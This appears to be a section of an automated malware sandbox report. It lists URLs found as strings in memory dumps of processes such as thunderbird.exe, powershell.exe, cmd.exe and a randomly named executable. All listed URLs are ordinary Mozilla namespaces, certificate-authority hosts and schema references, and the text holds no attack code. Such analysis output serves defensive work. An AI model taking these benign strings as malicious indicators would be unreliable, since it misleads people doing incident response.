Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#description
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#extension
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#extensionhttp://home.netscape.com/NC-rdf#pulsehttp://home.netscape.c
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#fileExtensions
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#handleInternal
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#open
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#path
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#persist
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#prettyName
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#pulse
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#saveToDisk
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#useSystemDefault
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#value
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#valuehttp://home.netscape.com/NC-rdf#attributehttp://home.netscape.c
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/WEB-rdf#LastModifiedDate
Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.00000000031BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452498639.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: AppsLo.exe, 00000007.00000002.2464857097.0000000001168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.c
Source: thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/anyTypeFailure
Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2119626367.00000000043F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://wpad/wpad.dat
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://wpad/wpad.datnetwork.proxy.autoconfig_urlnetwork.proxy.no_proxies_onnetwork.proxy.failover_ti
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C09000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.0000000005323000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452498639.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451905011.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/2002/soap/securityweb-scripts-access.xmlUnknownElementUnknownAttributeElement
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2462479516.00000000601CB000.00000002.00000001.01000000.00000010.sdmp, thunderbird.exe, 00000008.00000002.2462744171.0000000060293000.00000002.00000001.01000000.00000017.sdmp, thunderbird.exe, 00000008.00000002.2462912502.00000000602A2000.00000002.00000001.01000000.00000018.sdmp, thunderbird.exe, 00000009.00000002.2637819333.00000000601CB000.00000002.00000001.01000000.0000001E.sdmp, thunderbird.exe, 00000009.00000002.2638141229.0000000060293000.00000002.00000001.01000000.00000025.sdmp, thunderbird.exe, 00000009.00000002.2638289942.00000000602A2000.00000002.00000001.01000000.00000026.sdmp, thunderbird.exe, 00000010.00000002.2991933568.00000000602A2000.00000002.00000001.01000000.00000026.sdmp, thunderbird.exe, 00000010.00000002.2991833279.0000000060293000.00000002.00000001.01000000.00000025.sdmp, thunderbird.exe, 00000010.00000002.2991629455.00000000601CB000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000003.2451777939.0000000003143000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2462479516.00000000601CB000.00000002.00000001.01000000.00000010.sdmp, thunderbird.exe, 00000008.00000002.2462744171.0000000060293000.00000002.00000001.01000000.00000017.sdmp, thunderbird.exe, 00000008.00000002.2462912502.00000000602A2000.00000002.00000001.01000000.00000018.sdmp, thunderbird.exe, 00000009.00000002.2637819333.00000000601CB000.00000002.00000001.01000000.0000001E.sdmp, thunderbird.exe, 00000009.00000002.2638141229.0000000060293000.00000002.00000001.01000000.00000025.sdmp, thunderbird.exe, 00000009.00000002.2638289942.00000000602A2000.00000002.00000001.01000000.00000026.sdmp, thunderbird.exe, 00000010.00000002.2991933568.00000000602A2000.00000002.00000001.01000000.00000026.sdmp, thunderbird.exe, 00000010.00000002.2991833279.0000000060293000.00000002.00000001.01000000.00000025.sdmp, thunderbird.exe, 00000010.00000002.2991629455.00000000601CB000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/Copyright
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/TransforMiixtransformiix:resulttbodyapplication/xmltransformiixResultpre4.0
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/credits/
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/credits/credits#?%Y-%m-%d-%H%M%S.txtnew-all-bloatlogsMemory
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xmllayout.fire_onload_after_image_background_loads8
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#name
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#packages
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#packageshttp://www.mozilla.org/rdf/chrome#namehttp://www.mozilla.o
